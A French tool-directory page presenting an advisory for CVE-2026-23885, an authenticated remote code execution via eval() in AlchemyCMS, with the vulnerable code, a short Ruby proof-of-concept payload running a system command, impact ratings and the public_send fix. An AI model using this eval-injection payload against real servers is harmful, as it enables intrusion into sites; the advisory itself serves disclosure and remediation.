Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23885 — Preuve de concept d'exploitation pour CVE-2026-23885, une RCE authentifiée dans AlchemyCMS via injection eval(), avec analyse technique et recommandations de remédiation. | Kitploit
Outils/GitHubGitHub/thedeepopc/cve-2026-23885
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubthedeepopc/cve-2026-23885

CVE-2026-23885

Preuve de concept d'exploitation pour CVE-2026-23885, une RCE authentifiée dans AlchemyCMS via injection eval(), avec analyse technique et recommandations de remédiation.

Voir le dépôt
1il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Avis de sécurité : CVE-2026-23885

Exécution de code à distance (RCE) authentifiée dans AlchemyCMS

1. Résumé exécutif

Une vulnérabilité de sécurité critique impliquant une neutralisation incorrecte des directives dans du code évalué dynamiquement (CWE-95) a été découverte dans le framework AlchemyCMS. Cette vulnérabilité permet à un utilisateur authentifié disposant de privilèges administratifs d'exécuter du code Ruby arbitraire et des commandes système sur le serveur hôte via un point d'injection eval().


2. Analyse technique de la vulnérabilité

Composant vulnérable

  • Fichier : app/helpers/alchemy/resources_helper.rb
  • Méthode : Alchemy::ResourcesHelper#resource_url_proxy
  • Niveau de risque : Modéré/Élevé (RCE authentifiée)

Cause racine

La méthode d'assistance traite de manière non sécurisée l'attribut engine_name de l'objet resource_handler. Cet attribut est transmis directement à la fonction Ruby eval() sans assainissement ni validation préalable.

root@kitploit:~
def resource_url_proxy(resource_handler)
  if resource_handler.in_engine?
    eval(resource_handler.engine_name) # rubocop:disable Security/Eval
  else
    main_app
  end
end
La présence de la directive # rubocop:disable Security/Eval confirme que les implications de sécurité liées à l'utilisation de eval() ont été reconnues mais contournées lors de l'implémentation.

3. Preuve de concept (PoC)
Vecteur d'attaque
La vulnérabilité est déclenchée dans l'interface administrative d'AlchemyCMS lors du rendu des vues basées sur les ressources (par exemple, Sites ou Languages). Si un attaquant parvient à manipuler la configuration du module ou les données de ressources sous-jacentes, il peut parvenir à une exécution.

Script d'exploitation autonome
Le script suivant démontre l'exécution de code arbitraire en simulant l'environnement de la méthode d'assistance vulnérable :

Ruby

require 'ostruct'

def resource_url_proxy(resource_handler)
  if resource_handler.engine_name && !resource_handler.engine_name.empty?
    eval(resource_handler.engine_name)
  end
end

# Payload : exécute la commande système 'id' et crée un fichier de preuve
payload = "system('id > /tmp/rce_verified'); 'main_app'"
handler = OpenStruct.new(engine_name: payload)

resource_url_proxy(handler)
Preuve d'exécution
Lors de l'exécution, la commande système est traitée, accordant à l'attaquant un accès à l'environnement du serveur.
Preuve RCE dans le terminal
  1. Impact et gravité Confidentialité : Élevée. Accès complet aux données applicatives et aux secrets d'environnement.

Intégrité : Élevée. Capacité à modifier des fichiers et des enregistrements de base de données.

Disponibilité : Élevée. Risque de perturbation complète du système.

Identifiant CVE : CVE-2026-23885

  1. Correctif La vulnérabilité a été corrigée dans les versions patchées suivantes :

7.4.12

8.0.3

Le correctif consiste à remplacer l'appel à eval() par public_send() afin d'acheminer de manière sécurisée les requêtes vers le proxy de moteur prévu :

Ruby

main_app.public_send(resource_handler.engine_name) if resource_handler.engine_name.present?

Découverte de la vulnérabilité : Audit de sécurité indépendant

Référence CVE : CVE-2026-23885

  • Liste CVE : CVE-2026-23885 sur CVE.org
  • Analyse de la vulnérabilité : Base de données Tenable CVE-2026-23885
  • Politique de sécurité AlchemyCMS : Directives de sécurité
Télécharger l’outil